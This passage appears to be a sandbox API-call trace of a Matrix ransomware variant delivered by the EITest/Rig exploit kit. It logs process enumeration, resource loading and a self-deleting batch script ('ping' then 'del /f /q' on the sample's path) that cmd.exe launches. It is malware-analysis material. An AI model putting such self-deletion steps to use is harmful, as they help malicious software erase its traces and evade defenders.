th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="spoolsv.exe")) returned 1 [0093.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0093.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, 
szExeFile="taskhost.exe")) returned 1 [0093.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0093.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0093.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0093.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0093.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0093.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0093.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0093.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0093.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0093.793] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0093.794] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0093.795] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0093.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0093.838] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0093.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0093.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0093.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0093.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0093.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0093.845] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa78, pcPriClassBase=8, dwFlags=0x0, szExeFile="2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe")) returned 1 [0093.850] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaac, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0093.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: 
lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0093.853] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0093.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0093.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 0 [0093.858] CloseHandle (hObject=0xbc) returned 1 [0093.858] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 
0x57 [0093.858] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0093.858] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0093.858] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0093.858] LockResource (hResData=0x5187d4) returned 0x5187d4 [0093.858] FreeResource (hResData=0x5187d4) returned 0 [0093.858] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.858] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.858] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.858] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.858] FreeResource (hResData=0x50d64c) returned 0 [0093.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.858] GetCurrentThreadId () returned 0xa8c [0093.858] GetCurrentThreadId () returned 0xa8c [0093.858] GetCurrentThreadId () returned 0xa8c [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 
| out: lpWideCharStr=0x0) returned 83 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13db4fc, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0093.858] GetTickCount () returned 0x22c1e [0093.858] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15064742395) returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x52\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x69\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x4b\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x57\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x78\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: 
lpWideCharStr="\x4f\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x61\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="\x4c\x12\xfbb4\x12\x29e8\x2f\xfbbc\x12\x2a60\x2f\xaf2e\x22aa\xebb8\x12\xb118\x40\x4e4") returned 1 [0093.858] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0093.858] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0093.858] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", lpszShortPath=0x13b078c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE") returned 0x25 [0093.859] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0093.859] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0093.859] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\rikwxoal.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xbc [0093.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q 
\"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", cchWideChar=123, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 123 [0093.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", cchWideChar=123, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 123 [0093.859] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", cchWideChar=123, lpMultiByteStr=0x137f5a0, cbMultiByte=123, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\Desktop\\2017-0~1.EXE\"\r\n", lpUsedDefaultChar=0x0) returned 123 [0093.859] WriteFile (in: hFile=0xbc, lpBuffer=0x137f5a0*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x137f5a0*, lpNumberOfBytesWritten=0x12fb60*=0x7b, lpOverlapped=0x0) returned 1 [0093.860] CloseHandle (hObject=0xbc) returned 1 [0093.861] GetCurrentThreadId () returned 0xa8c [0093.861] GetCurrentThreadId () returned 0xa8c [0093.861] GetCurrentThreadId () returned 0xa8c [0093.861] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\RiKWxOaL.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xc0, hThread=0xbc, dwProcessId=0xafc, dwThreadId=0xb00)) returned 1 [0093.868] CloseHandle (hObject=0xc0) returned 1 [0093.868] CloseHandle (hObject=0xbc) returned 1 [0093.868] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] 
GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] GetCurrentThreadId () returned 0xa8c [0093.869] WSACleanup () returned 0 [0093.968] FreeLibrary (hLibModule=0x77380000) returned 1 [0093.969] GetCurrentThreadId () returned 0xa8c [0093.969] GetCurrentThreadId () returned 0xa8c [0093.969] GetCurrentProcess () returned 0xffffffff [0093.969] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0093.969] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0093.969] GetCurrentThreadId () returned 0xa8c [0093.969] GetCurrentThreadId () returned 0xa8c [0093.970] ResetEvent (hEvent=0x88) returned 1 [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] ResetEvent (hEvent=0x88) returned 1 [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c [0093.970] GetCurrentThreadId () returned 0xa8c 